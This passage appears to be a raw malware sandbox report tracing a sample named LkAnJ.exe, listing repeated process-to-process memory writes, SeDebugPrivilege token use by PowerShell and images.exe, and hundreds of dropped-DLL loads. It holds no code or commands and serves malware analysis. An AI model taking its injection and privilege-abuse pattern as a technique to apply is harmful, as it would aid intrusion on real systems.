LkAnJ.exe 346 PID 2440 wrote to memory of 1248 2440 LkAnJ.exe 347 PID 2440 wrote to memory of 1248 2440 LkAnJ.exe 347 PID 2440 wrote to memory of 1248 2440 LkAnJ.exe 347 PID 2440 wrote to memory of 1248 2440 LkAnJ.exe 347 PID 2440 wrote to memory of 1248 2440 LkAnJ.exe 347 PID 2440 wrote to memory of 1248 2440 LkAnJ.exe 347 PID 2440 wrote to memory of 2520 2440 LkAnJ.exe 348 PID 2440 wrote to memory of 2520 2440 LkAnJ.exe 348 PID 2440 wrote to memory of 2520 2440 LkAnJ.exe 348 PID 2440 wrote to memory of 2520 2440 LkAnJ.exe 348 PID 2440 wrote to memory of 2588 2440 LkAnJ.exe 349 PID 2440 wrote to memory of 2588 2440 LkAnJ.exe 349 PID 2440 wrote to memory of 2588 2440 LkAnJ.exe 349 PID 2440 wrote to memory of 2588 2440 LkAnJ.exe 349 PID 2588 wrote to memory of 2572 2588 LkAnJ.exe 350 PID 2588 wrote to memory of 2572 2588 LkAnJ.exe 350 PID 2588 wrote to memory of 2572 2588 LkAnJ.exe 350 PID 2588 wrote to memory of 2572 2588 LkAnJ.exe 350 PID 2572 wrote to memory of 2684 2572 LkAnJ.exe 351 PID 2572 wrote to memory of 2684 2572 LkAnJ.exe 351 PID 2572 wrote to memory of 2684 2572 LkAnJ.exe 351 PID 2572 wrote to memory of 2684 2572 LkAnJ.exe 351 PID 2572 wrote to memory of 2684 2572 LkAnJ.exe 351 PID 2572 wrote to memory of 2684 2572 LkAnJ.exe 351 PID 2572 wrote to memory of 2536 2572 LkAnJ.exe 352 PID 2572 wrote to memory of 2536 2572 LkAnJ.exe 352 PID 2572 wrote to memory of 2536 2572 LkAnJ.exe 352 PID 2572 wrote to memory of 2536 2572 LkAnJ.exe 352 PID 2572 wrote to memory of 2736 2572 LkAnJ.exe 353 PID 2572 wrote to memory of 2736 2572 LkAnJ.exe 353 PID 2572 wrote to memory of 2736 2572 LkAnJ.exe 353 PID 2572 wrote to memory of 2736 2572 LkAnJ.exe 353 PID 2736 wrote to memory of 2708 2736 LkAnJ.exe 354 PID 2736 wrote to memory of 2708 2736 LkAnJ.exe 354 PID 2736 wrote to memory of 2708 2736 LkAnJ.exe 354 PID 2736 wrote to memory of 2708 2736 LkAnJ.exe 354 PID 2708 wrote to memory of 2740 2708 LkAnJ.exe 355 PID 2708 wrote to memory of 2740 2708 LkAnJ.exe 355 PID 2708 wrote to memory of 2740 2708 LkAnJ.exe 355 PID 2708 wrote to memory of 2740 2708 LkAnJ.exe 355 PID 2708 wrote to memory of 2740 2708 LkAnJ.exe 355 PID 2708 wrote to memory of 2740 2708 LkAnJ.exe 355 PID 2708 wrote to memory of 2756 2708 LkAnJ.exe 356 PID 2708 wrote to memory of 2756 2708 LkAnJ.exe 356 PID 2708 wrote to memory of 2756 2708 LkAnJ.exe 356 PID 2708 wrote to memory of 2756 2708 LkAnJ.exe 356 PID 2708 wrote to memory of 2720 2708 LkAnJ.exe 357 PID 2708 wrote to memory of 2720 2708 LkAnJ.exe 357 PID 2708 wrote to memory of 2720 2708 LkAnJ.exe 357 PID 2708 wrote to memory of 2720 2708 LkAnJ.exe 357 PID 2720 wrote to memory of 1960 2720 LkAnJ.exe 358 PID 2720 wrote to memory of 1960 2720 LkAnJ.exe 358 PID 2720 wrote to memory of 1960 2720 LkAnJ.exe 358 PID 2720 wrote to memory of 1960 2720 LkAnJ.exe 358 PID 1960 wrote to memory of 2012 1960 LkAnJ.exe 359 PID 1960 wrote to memory of 2012 1960 LkAnJ.exe 359 PID 1960 wrote to memory of 2012 1960 LkAnJ.exe 359 PID 1960 wrote to memory of 2012 1960 LkAnJ.exe 359 PID 1960 wrote to memory of 2012 1960 LkAnJ.exe 359 PID 1960 wrote to memory of 2012 1960 LkAnJ.exe 359 PID 1960 wrote to memory of 1876 1960 LkAnJ.exe 360 PID 1960 wrote to memory of 1876 1960 LkAnJ.exe 360 PID 1960 wrote to memory of 1876 1960 LkAnJ.exe 360 PID 1960 wrote to memory of 1876 1960 LkAnJ.exe 360 PID 1960 wrote to memory of 2904 1960 LkAnJ.exe 361 PID 1960 wrote to memory of 2904 1960 LkAnJ.exe 361 PID 1960 wrote to memory of 2904 1960 LkAnJ.exe 361 PID 1960 wrote to memory of 2904 1960 LkAnJ.exe 361 PID 2904 wrote to memory of 2944 2904 LkAnJ.exe 362 PID 2904 wrote to memory of 2944 2904 LkAnJ.exe 362 PID 2904 wrote to memory of 2944 2904 LkAnJ.exe 362 PID 2904 wrote to memory of 2944 2904 LkAnJ.exe 362 PID 2944 wrote to memory of 2988 2944 LkAnJ.exe 363 PID 2944 wrote to memory of 2988 2944 LkAnJ.exe 363 PID 2944 wrote to memory of 2988 2944 LkAnJ.exe 363 PID 2944 wrote to memory of 2988 2944 LkAnJ.exe 363 PID 2944 wrote to memory of 2988 2944 LkAnJ.exe 363 PID 2944 wrote to memory of 2988 2944 LkAnJ.exe 363 PID 2944 wrote to memory of 2928 2944 LkAnJ.exe 364 PID 2944 wrote to memory of 2928 2944 LkAnJ.exe 364 PID 2944 wrote to memory of 2928 2944 LkAnJ.exe 364 PID 2944 wrote to memory of 2928 2944 LkAnJ.exe 364 PID 2944 wrote to memory of 2964 2944 LkAnJ.exe 365 PID 2944 wrote to memory of 2964 2944 LkAnJ.exe 365 PID 2944 wrote to memory of 2964 2944 LkAnJ.exe 365 PID 2944 wrote to memory of 2964 2944 LkAnJ.exe 365 PID 2964 wrote to memory of 3016 2964 LkAnJ.exe 366 PID 2964 wrote to memory of 3016 2964 LkAnJ.exe 366 PID 2964 wrote to memory of 3016 2964 LkAnJ.exe 366 PID 2964 wrote to memory of 3016 2964 LkAnJ.exe 366 PID 3016 wrote to memory of 2076 3016 LkAnJ.exe 367 PID 3016 wrote to memory of 2076 3016 LkAnJ.exe 367 PID 3016 wrote to memory of 2076 3016 LkAnJ.exe 367 PID 3016 wrote to memory of 2076 3016 LkAnJ.exe 367 PID 3016 wrote to memory of 2076 3016 LkAnJ.exe 367 PID 3016 wrote to memory of 2076 3016 LkAnJ.exe 367 PID 3016 wrote to memory of 2052 3016 LkAnJ.exe 368 PID 3016 wrote to memory of 2052 3016 LkAnJ.exe 368 PID 3016 wrote to memory of 2052 3016 LkAnJ.exe 368 PID 3016 wrote to memory of 2052 3016 LkAnJ.exe 368 PID 3016 wrote to memory of 1056 3016 LkAnJ.exe 369 PID 3016 wrote to memory of 1056 3016 LkAnJ.exe 369 PID 3016 wrote to memory of 1056 3016 LkAnJ.exe 369 PID 3016 wrote to memory of 1056 3016 LkAnJ.exe 369 PID 1056 wrote to memory of 340 1056 LkAnJ.exe 370 PID 1056 wrote to memory of 340 1056 LkAnJ.exe 370 PID 1056 wrote to memory of 340 1056 LkAnJ.exe 370 PID 1056 wrote to memory of 340 1056 LkAnJ.exe 370 PID 340 wrote to memory of 576 340 LkAnJ.exe 371 PID 340 wrote to memory of 576 340 LkAnJ.exe 371 PID 340 wrote to memory of 576 340 LkAnJ.exe 371 PID 340 wrote to memory of 576 340 LkAnJ.exe 371 PID 340 wrote to memory of 576 340 LkAnJ.exe 371 PID 340 wrote to memory of 576 340 LkAnJ.exe 371 PID 340 wrote to memory of 2020 340 LkAnJ.exe 372 PID 340 wrote to memory of 2020 340 LkAnJ.exe 372 PID 340 wrote to memory of 2020 340 LkAnJ.exe 372 PID 340 wrote to memory of 2020 340 LkAnJ.exe 372 PID 340 wrote to memory of 820 340 LkAnJ.exe 373 PID 340 wrote to memory of 820 340 LkAnJ.exe 373 PID 340 wrote to memory of 820 340 LkAnJ.exe 373 PID 340 wrote to memory of 820 340 LkAnJ.exe 373 PID 820 wrote to memory of 816 820 LkAnJ.exe 374 PID 820 wrote to memory of 816 820 LkAnJ.exe 374 PID 820 wrote to memory of 816 820 LkAnJ.exe 374 PID 820 wrote to memory of 816 820 LkAnJ.exe 374 PID 816 wrote to memory of 1352 816 LkAnJ.exe 375 PID 816 wrote to memory of 1352 816 LkAnJ.exe 375 PID 816 wrote to memory of 1352 816 LkAnJ.exe 375 PID 816 wrote to memory of 1352 816 LkAnJ.exe 375 PID 816 wrote to memory of 1352 816 LkAnJ.exe 375 PID 816 wrote to memory of 1352 816 LkAnJ.exe 375 PID 816 wrote to memory of 1640 816 LkAnJ.exe 376 PID 816 wrote to memory of 1640 816 LkAnJ.exe 376 PID 816 wrote to memory of 1640 816 LkAnJ.exe 376 PID 816 wrote to memory of 1640 816 LkAnJ.exe 376 PID 816 wrote to memory of 2184 816 LkAnJ.exe 377 PID 816 wrote to memory of 2184 816 LkAnJ.exe 377 PID 816 wrote to memory of 2184 816 LkAnJ.exe 377 PID 816 wrote to memory of 2184 816 LkAnJ.exe 377 PID 2184 wrote to memory of 2284 2184 LkAnJ.exe 378 PID 2184 wrote to memory of 2284 2184 LkAnJ.exe 378 PID 2184 wrote to memory of 2284 2184 LkAnJ.exe 378 PID 2184 wrote to memory of 2284 2184 LkAnJ.exe 378 PID 2284 wrote to memory of 2288 2284 LkAnJ.exe 379 PID 2284 wrote to memory of 2288 2284 LkAnJ.exe 379 PID 2284 wrote to memory of 2288 2284 LkAnJ.exe 379 PID 2284 wrote to memory of 2288 2284 LkAnJ.exe 379 PID 2284 wrote to memory of 2288 2284 LkAnJ.exe 379 PID 2284 wrote to memory of 2288 2284 LkAnJ.exe 379 PID 2284 wrote to memory of 2468 2284 LkAnJ.exe 380 PID 2284 wrote to memory of 2468 2284 LkAnJ.exe 380 PID 2284 wrote to memory of 2468 2284 LkAnJ.exe 380 PID 2284 wrote to memory of 2468 2284 LkAnJ.exe 380 PID 2284 wrote to memory of 2320 2284 LkAnJ.exe 381 PID 2284 wrote to memory of 2320 2284 LkAnJ.exe 381 PID 2284 wrote to memory of 2320 2284 LkAnJ.exe 381 PID 2284 wrote to memory of 2320 2284 LkAnJ.exe 381 PID 2320 wrote to memory of 2316 2320 LkAnJ.exe 382 PID 2320 wrote to memory of 2316 2320 LkAnJ.exe 382 PID 2320 wrote to memory of 2316 2320 LkAnJ.exe 382 PID 2320 wrote to memory of 2316 2320 LkAnJ.exe 382 PID 2316 wrote to memory of 2464 2316 LkAnJ.exe 383 PID 2316 wrote to memory of 2464 2316 LkAnJ.exe 383 PID 2316 wrote to memory of 2464 2316 LkAnJ.exe 383 PID 2316 wrote to memory of 2464 2316 LkAnJ.exe 383 PID 2316 wrote to memory of 2464 2316 LkAnJ.exe 383 PID 2316 wrote to memory of 2464 2316 LkAnJ.exe 383 PID 2316 wrote to memory of 2544 2316 LkAnJ.exe 384 PID 2316 wrote to memory of 2544 2316 LkAnJ.exe 384 PID 2316 wrote to memory of 2544 2316 LkAnJ.exe 384 PID 2316 wrote to memory of 2544 2316 LkAnJ.exe 384 PID 2316 wrote to memory of 2588 2316 LkAnJ.exe 385 PID 2316 wrote to memory of 2588 2316 LkAnJ.exe 385 PID 2316 wrote to memory of 2588 2316 LkAnJ.exe 385 PID 2316 wrote to memory of 2588 2316 LkAnJ.exe 385 PID 2588 wrote to memory of 1800 2588 LkAnJ.exe 386 PID 2588 wrote to memory of 1800 2588 LkAnJ.exe 386 PID 2588 wrote to memory of 1800 2588 LkAnJ.exe 386 PID 2588 wrote to memory of 1800 2588 LkAnJ.exe 386 PID 1800 wrote to memory of 2636 1800 LkAnJ.exe 387 PID 1800 wrote to memory of 2636 1800 LkAnJ.exe 387 PID 1800 wrote to memory of 2636 1800 LkAnJ.exe 387 PID 1800 wrote to memory of 2636 1800 LkAnJ.exe 387 PID 1800 wrote to memory of 2636 1800 LkAnJ.exe 387 PID 1800 wrote to memory of 2636 1800 LkAnJ.exe 387 PID 1800 wrote to memory of 936 1800 LkAnJ.exe 388 PID 1800 wrote to memory of 936 1800 LkAnJ.exe 388 PID 1800 wrote to memory of 936 1800 LkAnJ.exe 388 PID 1800 wrote to memory of 936 1800 LkAnJ.exe 388 PID 1800 wrote to memory of 2736 1800 LkAnJ.exe 389 PID 1800 wrote to memory of 2736 1800 LkAnJ.exe 389 PID 1800 wrote to memory of 2736 1800 LkAnJ.exe 389 PID 1800 wrote to memory of 2736 1800 LkAnJ.exe 389 PID 2736 wrote to memory of 1420 2736 LkAnJ.exe 390 PID 2736 wrote to memory of 1420 2736 LkAnJ.exe 390 PID 2736 wrote to memory of 1420 2736 LkAnJ.exe 390 PID 2736 wrote to memory of 1420 2736 LkAnJ.exe 390 PID 1420 wrote to memory of 1548 1420 LkAnJ.exe 391 PID 1420 wrote to memory of 1548 1420 LkAnJ.exe 391 PID 1420 wrote to memory of 1548 1420 LkAnJ.exe 391 PID 1420 wrote to memory of 1548 1420 LkAnJ.exe 391 PID 1420 wrote to memory of 1548 1420 LkAnJ.exe 391 PID 1420 wrote to memory of 1548 1420 LkAnJ.exe 391 PID 1420 wrote to memory of 1148 1420 LkAnJ.exe 392 PID 1420 wrote to memory of 1148 1420 LkAnJ.exe 392 PID 1420 wrote to memory of 1148 1420 LkAnJ.exe 392 PID 1420 wrote to memory of 1148 1420 LkAnJ.exe 392 PID 1420 wrote to memory of 2768 1420 LkAnJ.exe 393 PID 1420 wrote to memory of 2768 1420 LkAnJ.exe 393 PID 1420 wrote to memory of 2768 1420 LkAnJ.exe 393 PID 1420 wrote to memory of 2768 1420 LkAnJ.exe 393 PID 2768 wrote to memory of 2824 2768 LkAnJ.exe 394 PID 2768 wrote to memory of 2824 2768 LkAnJ.exe 394 PID 2768 wrote to memory of 2824 2768 LkAnJ.exe 394 PID 2768 wrote to memory of 2824 2768 LkAnJ.exe 394 PID 2824 wrote to memory of 2872 2824 LkAnJ.exe 395 PID 2824 wrote to memory of 2872 2824 LkAnJ.exe 395 PID 2824 wrote to memory of 2872 2824 LkAnJ.exe 395 PID 2824 wrote to memory of 2872 2824 LkAnJ.exe 395 PID 2824 wrote to memory of 2872 2824 LkAnJ.exe 395 PID 2824 wrote to memory of 2872 2824 LkAnJ.exe 395 PID 2824 wrote to memory of 2980 2824 LkAnJ.exe 396 PID 2824 wrote to memory of 2980 2824 LkAnJ.exe 396 PID 2824 wrote to memory of 2980 2824 LkAnJ.exe 396 PID 2824 wrote to memory of 2980 2824 LkAnJ.exe 396 PID 2824 wrote to memory of 2912 2824 LkAnJ.exe 397 PID 2824 wrote to memory of 2912 2824 LkAnJ.exe 397 PID 2824 wrote to memory of 2912 2824 LkAnJ.exe 397 PID 2824 wrote to memory of 2912 2824 LkAnJ.exe 397 PID 2912 wrote to memory of 2940 2912 LkAnJ.exe 398 PID 2912 wrote to memory of 2940 2912 LkAnJ.exe 398 PID 2912 wrote to memory of 2940 2912 LkAnJ.exe 398 PID 2912 wrote to memory of 2940 2912 LkAnJ.exe 398 PID 2940 wrote to memory of 2964 2940 LkAnJ.exe 399 PID 2940 wrote to memory of 2964 2940 LkAnJ.exe 399 PID 2940 wrote to memory of 2964 2940 LkAnJ.exe 399 PID 2940 wrote to memory of 2964 2940 LkAnJ.exe 399 PID 2940 wrote to memory of 2964 2940 LkAnJ.exe 399 PID 2940 wrote to memory of 2964 2940 LkAnJ.exe 399 PID 2940 wrote to memory of 2972 2940 LkAnJ.exe 400 PID 2940 wrote to memory of 2972 2940 LkAnJ.exe 400 PID 2940 wrote to memory of 2972 2940 LkAnJ.exe 400 PID 2940 wrote to memory of 2972 2940 LkAnJ.exe 400 PID 2940 wrote to memory of 3032 2940 LkAnJ.exe 401 PID 2940 wrote to memory of 3032 2940 LkAnJ.exe 401 PID 2940 wrote to memory of 3032 2940 LkAnJ.exe 401 PID 2940 wrote to memory of 3032 2940 LkAnJ.exe 401 PID 3032 wrote to memory of 324 3032 LkAnJ.exe 402 PID 3032 wrote to memory of 324 3032 LkAnJ.exe 402 PID 3032 wrote to memory of 324 3032 LkAnJ.exe 402 PID 3032 wrote to memory of 324 3032 LkAnJ.exe 402 PID 324 wrote to memory of 2080 324 LkAnJ.exe 403 PID 324 wrote to memory of 2080 324 LkAnJ.exe 403 PID 324 wrote to memory of 2080 324 LkAnJ.exe 403 PID 324 wrote to memory of 2080 324 LkAnJ.exe 403 PID 324 wrote to memory of 2080 324 LkAnJ.exe 403 PID 324 wrote to memory of 2080 324 LkAnJ.exe 403 PID 324 wrote to memory of 2096 324 LkAnJ.exe 404 PID 324 wrote to memory of 2096 324 LkAnJ.exe 404 PID 324 wrote to memory of 2096 324 LkAnJ.exe 404 PID 324 wrote to memory of 2096 324 LkAnJ.exe 404 PID 324 wrote to memory of 340 324 LkAnJ.exe 405 PID 324 wrote to memory of 340 324 LkAnJ.exe 405 PID 324 wrote to memory of 340 324 LkAnJ.exe 405 PID 324 wrote to memory of 340 324 LkAnJ.exe 405 PID 340 wrote to memory of 2132 340 LkAnJ.exe 406 PID 340 wrote to memory of 2132 340 LkAnJ.exe 406 PID 340 wrote to memory of 2132 340 LkAnJ.exe 406 PID 340 wrote to memory of 2132 340 LkAnJ.exe 406 PID 2132 wrote to memory of 2160 2132 LkAnJ.exe 407 PID 2132 wrote to memory of 2160 2132 LkAnJ.exe 407 PID 2132 wrote to memory of 2160 2132 LkAnJ.exe 407 PID 2132 wrote to memory of 2160 2132 LkAnJ.exe 407 PID 2132 wrote to memory of 2160 2132 LkAnJ.exe 407 PID 2132 wrote to memory of 2160 2132 LkAnJ.exe 407 PID 2132 wrote to memory of 1568 2132 LkAnJ.exe 408 PID 2132 wrote to memory of 1568 2132 LkAnJ.exe 408 PID 2132 wrote to memory of 1568 2132 LkAnJ.exe 408 PID 2132 wrote to memory of 1568 2132 LkAnJ.exe 408 PID 2132 wrote to memory of 2416 2132 LkAnJ.exe 409 PID 2132 wrote to memory of 2416 2132 LkAnJ.exe 409 PID 2132 wrote to memory of 2416 2132 LkAnJ.exe 409 PID 2132 wrote to memory of 2416 2132 LkAnJ.exe 409 PID 2416 wrote to memory of 668 2416 LkAnJ.exe 410 PID 2416 wrote to memory of 668 2416 LkAnJ.exe 410 PID 2416 wrote to memory of 668 2416 LkAnJ.exe 410 PID 2416 wrote to memory of 668 2416 LkAnJ.exe 410 PID 668 wrote to memory of 2204 668 LkAnJ.exe 411 PID 668 wrote to memory of 2204 668 LkAnJ.exe 411 PID 668 wrote to memory of 2204 668 LkAnJ.exe 411 PID 668 wrote to memory of 2204 668 LkAnJ.exe 411 PID 668 wrote to memory of 2204 668 LkAnJ.exe 411 PID 668 wrote to memory of 2204 668 LkAnJ.exe 411 PID 668 wrote to memory of 2252 668 LkAnJ.exe 412 PID 668 wrote to memory of 2252 668 LkAnJ.exe 412 PID 668 wrote to memory of 2252 668 LkAnJ.exe 412 PID 668 wrote to memory of 2252 668 LkAnJ.exe 412 PID 668 wrote to memory of 2328 668 LkAnJ.exe 413 PID 668 wrote to memory of 2328 668 LkAnJ.exe 413 PID 668 wrote to memory of 2328 668 LkAnJ.exe 413 PID 668 wrote to memory of 2328 668 LkAnJ.exe 413 PID 2328 wrote to memory of 2308 2328 LkAnJ.exe 414 PID 2328 wrote to memory of 2308 2328 LkAnJ.exe 414 PID 2328 wrote to memory of 2308 2328 LkAnJ.exe 414 PID 2328 wrote to memory of 2308 2328 LkAnJ.exe 414 PID 2308 wrote to memory of 2324 2308 LkAnJ.exe 415 PID 2308 wrote to memory of 2324 2308 LkAnJ.exe 415 PID 2308 wrote to memory of 2324 2308 LkAnJ.exe 415 PID 2308 wrote to memory of 2324 2308 LkAnJ.exe 415 PID 2308 wrote to memory of 2324 2308 LkAnJ.exe 415 PID 2308 wrote to memory of 2324 2308 LkAnJ.exe 415 PID 2308 wrote to memory of 1248 2308 LkAnJ.exe 416 PID 2308 wrote to memory of 1248 2308 LkAnJ.exe 416 PID 2308 wrote to memory of 1248 2308 LkAnJ.exe 416 PID 2308 wrote to memory of 1248 2308 LkAnJ.exe 416 PID 2308 wrote to memory of 2440 2308 LkAnJ.exe 417 PID 2308 wrote to memory of 2440 2308 LkAnJ.exe 417 PID 2308 wrote to memory of 2440 2308 LkAnJ.exe 417 PID 2308 wrote to memory of 2440 2308 LkAnJ.exe 417 PID 2440 wrote to memory of 2576 2440 LkAnJ.exe 418 PID 2440 wrote to memory of 2576 2440 LkAnJ.exe 418 PID 2440 wrote to memory of 2576 2440 LkAnJ.exe 418 PID 2440 wrote to memory of 2576 2440 LkAnJ.exe 418 PID 2576 wrote to memory of 2620 2576 LkAnJ.exe 419 PID 2576 wrote to memory of 2620 2576 LkAnJ.exe 419 PID 2576 wrote to memory of 2620 2576 LkAnJ.exe 419 PID 2576 wrote to memory of 2620 2576 LkAnJ.exe 419 PID 2576 wrote to memory of 2620 2576 LkAnJ.exe 419 PID 2576 wrote to memory of 2620 2576 LkAnJ.exe 419 PID 2576 wrote to memory of 2556 2576 LkAnJ.exe 420 PID 2576 wrote to memory of 2556 2576 LkAnJ.exe 420 PID 2576 wrote to memory of 2556 2576 LkAnJ.exe 420 PID 2576 wrote to memory of 2556 2576 LkAnJ.exe 420 PID 2576 wrote to memory of 2608 2576 LkAnJ.exe 421 PID 2576 wrote to memory of 2608 2576 LkAnJ.exe 421 PID 2576 wrote to memory of 2608 2576 LkAnJ.exe 421 PID 2576 wrote to memory of 2608 2576 LkAnJ.exe 421 PID 2608 wrote to memory of 1428 2608 LkAnJ.exe 422 PID 2608 wrote to memory of 1428 2608 LkAnJ.exe 422 PID 2608 wrote to memory of 1428 2608 LkAnJ.exe 422 PID 2608 wrote to memory of 1428 2608 LkAnJ.exe 422 PID 1428 wrote to memory of 936 1428 LkAnJ.exe 423 PID 1428 wrote to memory of 936 1428 LkAnJ.exe 423 PID 1428 wrote to memory of 936 1428 LkAnJ.exe 423 PID 1428 wrote to memory of 936 1428 LkAnJ.exe 423 PID 1428 wrote to memory of 936 1428 LkAnJ.exe 423 PID 1428 wrote to memory of 936 1428 LkAnJ.exe 423 PID 1428 wrote to memory of 2736 1428 LkAnJ.exe 424 PID 1428 wrote to memory of 2736 1428 LkAnJ.exe 424 PID 1428 wrote to memory of 2736 1428 LkAnJ.exe 424 PID 1428 wrote to memory of 2736 1428 LkAnJ.exe 424 PID 1428 wrote to memory of 2884 1428 LkAnJ.exe 425 PID 1428 wrote to memory of 2884 1428 LkAnJ.exe 425 PID 1428 wrote to memory of 2884 1428 LkAnJ.exe 425 PID 1428 wrote to memory of 2884 1428 LkAnJ.exe 425 PID 2884 wrote to memory of 2788 2884 LkAnJ.exe 426 PID 2884 wrote to memory of 2788 2884 LkAnJ.exe 426 PID 2884 wrote to memory of 2788 2884 LkAnJ.exe 426 PID 2884 wrote to memory of 2788 2884 LkAnJ.exe 426 PID 2788 wrote to memory of 2832 2788 LkAnJ.exe 427 PID 2788 wrote to memory of 2832 2788 LkAnJ.exe 427 PID 2788 wrote to memory of 2832 2788 LkAnJ.exe 427 PID 2788 wrote to memory of 2832 2788 LkAnJ.exe 427 PID 2788 wrote to memory of 2832 2788 LkAnJ.exe 427 PID 2788 wrote to memory of 2832 2788 LkAnJ.exe 427 PID 2788 wrote to memory of 2904 2788 LkAnJ.exe 428 PID 2788 wrote to memory of 2904 2788 LkAnJ.exe 428 PID 2788 wrote to memory of 2904 2788 LkAnJ.exe 428 PID 2788 wrote to memory of 2904 2788 LkAnJ.exe 428 PID 2788 wrote to memory of 2992 2788 LkAnJ.exe 429 PID 2788 wrote to memory of 2992 2788 LkAnJ.exe 429 PID 2788 wrote to memory of 2992 2788 LkAnJ.exe 429 PID 2788 wrote to memory of 2992 2788 LkAnJ.exe 429 PID 2992 wrote to memory of 2980 2992 LkAnJ.exe 430 PID 2992 wrote to memory of 2980 2992 LkAnJ.exe 430 PID 2992 wrote to memory of 2980 2992 LkAnJ.exe 430 PID 2992 wrote to memory of 2980 2992 LkAnJ.exe 430 PID 2980 wrote to memory of 1700 2980 LkAnJ.exe 431 PID 2980 wrote to memory of 1700 2980 LkAnJ.exe 431 PID 2980 wrote to memory of 1700 2980 LkAnJ.exe 431 PID 2980 wrote to memory of 1700 2980 LkAnJ.exe 431 PID 2980 wrote to memory of 1700 2980 LkAnJ.exe 431 PID 2980 wrote to memory of 1700 2980 LkAnJ.exe 431 PID 2980 wrote to memory of 3064 2980 LkAnJ.exe 432 PID 2980 wrote to memory of 3064 2980 LkAnJ.exe 432 PID 2980 wrote to memory of 3064 2980 LkAnJ.exe 432 PID 2980 wrote to memory of 3064 2980 LkAnJ.exe 432 PID 2980 wrote to memory of 3068 2980 LkAnJ.exe 433 PID 2980 wrote to memory of 3068 2980 LkAnJ.exe 433 PID 2980 wrote to memory of 3068 2980 LkAnJ.exe 433 PID 2980 wrote to memory of 3068 2980 LkAnJ.exe 433 PID 3068 wrote to memory of 3056 3068 LkAnJ.exe 434 PID 3068 wrote to memory of 3056 3068 LkAnJ.exe 434 PID 3068 wrote to memory of 3056 3068 LkAnJ.exe 434 PID 3068 wrote to memory of 3056 3068 LkAnJ.exe 434 PID 3056 wrote to memory of 2068 3056 LkAnJ.exe 435 PID 3056 wrote to memory of 2068 3056 LkAnJ.exe 435 PID 3056 wrote to memory of 2068 3056 LkAnJ.exe 435 PID 3056 wrote to memory of 2068 3056 LkAnJ.exe 435 PID 3056 wrote to memory of 2068 3056 LkAnJ.exe 435 PID 3056 wrote to memory of 2068 3056 LkAnJ.exe 435 PID 3056 wrote to memory of 576 3056 LkAnJ.exe 436 PID 3056 wrote to memory of 576 3056 LkAnJ.exe 436 PID 3056 wrote to memory of 576 3056 LkAnJ.exe 436 PID 3056 wrote to memory of 576 3056 LkAnJ.exe 436 PID 3056 wrote to memory of 2080 3056 LkAnJ.exe 437 PID 3056 wrote to memory of 2080 3056 LkAnJ.exe 437 PID 3056 wrote to memory of 2080 3056 LkAnJ.exe 437 PID 3056 wrote to memory of 2080 3056 LkAnJ.exe 437 -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 792 powershell.exe Token: SeDebugPrivilege 1840 powershell.exe Token: SeDebugPrivilege 652 powershell.exe Token: SeDebugPrivilege 1656 images.exe -
Loads dropped DLL 305 IoCs
pid Process 1312 LkAnJ.exe 1312 LkAnJ.exe 1764 LkAnJ.exe 1764 LkAnJ.exe 1352 LkAnJ.exe 1644 LkAnJ.exe 1644 LkAnJ.exe 1964 LkAnJ.exe 2044 LkAnJ.exe 2044 LkAnJ.exe 340 LkAnJ.exe 1056 LkAnJ.exe 1056 LkAnJ.exe 1520 LkAnJ.exe 1588 LkAnJ.exe 1588 LkAnJ.exe 1172 LkAnJ.exe 2044 LkAnJ.exe 2044 LkAnJ.exe 1488 LkAnJ.exe 1696 LkAnJ.exe 1696 LkAnJ.exe 1132 LkAnJ.exe 1980 LkAnJ.exe 1980 LkAnJ.exe 1836 LkAnJ.exe 1816 LkAnJ.exe 1816 LkAnJ.exe 788 LkAnJ.exe 1184 LkAnJ.exe 1184 LkAnJ.exe 1272 Process not Found 1056 LkAnJ.exe 1232 LkAnJ.exe 1232 LkAnJ.exe 1548 LkAnJ.exe 2040 LkAnJ.exe 2040 LkAnJ.exe 1908 LkAnJ.exe 1836 LkAnJ.exe 1836 LkAnJ.exe 1496 LkAnJ.exe 1680 LkAnJ.exe 1680 LkAnJ.exe 480 LkAnJ.exe 1252 LkAnJ.exe 1252 LkAnJ.exe 1412 LkAnJ.exe 1544 LkAnJ.exe 1544 LkAnJ.exe 1552 LkAnJ.exe 304 LkAnJ.exe 304 LkAnJ.exe 788 LkAnJ.exe 1768 LkAnJ.exe 1768 LkAnJ.exe 1724 LkAnJ.exe 1592 LkAnJ.exe 1592 LkAnJ.exe 2036 LkAnJ.exe 756 LkAnJ.exe 756 LkAnJ.exe 1836 LkAnJ.exe 1816 LkAnJ.exe 1816 LkAnJ.exe 1784 LkAnJ.exe 1516 LkAnJ.exe 1516 LkAnJ.exe 452 LkAnJ.exe 616 LkAnJ.exe 616 LkAnJ.exe 1912 LkAnJ.exe 1052 LkAnJ.exe 1052 LkAnJ.exe 1760 LkAnJ.exe 1176 LkAnJ.exe 1176 LkAnJ.exe 452 LkAnJ.exe 784 LkAnJ.exe 784 LkAnJ.exe 1228 LkAnJ.exe 1784 LkAnJ.exe 1784 LkAnJ.exe 1412 LkAnJ.exe 552 LkAnJ.exe 552 LkAnJ.exe 340 LkAnJ.exe 1616 LkAnJ.exe 1616 LkAnJ.exe 1772 LkAnJ.exe 1412 LkAnJ.exe 1412 LkAnJ.exe 788 LkAnJ.exe 1844 LkAnJ.exe 1844 LkAnJ.exe 2000 LkAnJ.exe 2020 LkAnJ.exe 2020 LkAnJ.exe 1160 LkAnJ.exe 1856 LkAnJ.exe 1856 LkAnJ.exe 1632 LkAnJ.exe 1772 LkAnJ.exe 1772 LkAnJ.exe 340 LkAnJ.exe 2064 LkAnJ.exe 2064 LkAnJ.exe 2128 LkAnJ.exe 2156 LkAnJ.exe 2156 LkAnJ.exe 2220 LkAnJ.exe 2248 LkAnJ.exe 2248 LkAnJ.exe 2312 LkAnJ.exe 2436 LkAnJ.exe 2436 LkAnJ.exe 2500 LkAnJ.exe 2532 LkAnJ.exe 2532 LkAnJ.exe 2592 LkAnJ.exe 2632 LkAnJ.exe 2632 LkAnJ.exe 2696 LkAnJ.exe 2724 LkAnJ.exe 2724 LkAnJ.exe 2788 LkAnJ.exe 2816 LkAnJ.exe 2816 LkAnJ.exe 2876 LkAnJ.exe 2908 LkAnJ.exe 2908 LkAnJ.exe 2968 LkAnJ.exe 3000 LkAnJ.exe 3000 LkAnJ.exe 3064 LkAnJ.exe 324 LkAnJ.exe 324 LkAnJ.exe 2096 LkAnJ.exe 2148 LkAnJ.exe 2148 LkAnJ.exe 2160 LkAnJ.exe 2240 LkAnJ.exe 2240 LkAnJ.exe 2268 LkAnJ.exe 2292 LkAnJ.exe 2292 LkAnJ.exe 2440 LkAnJ.exe 2480 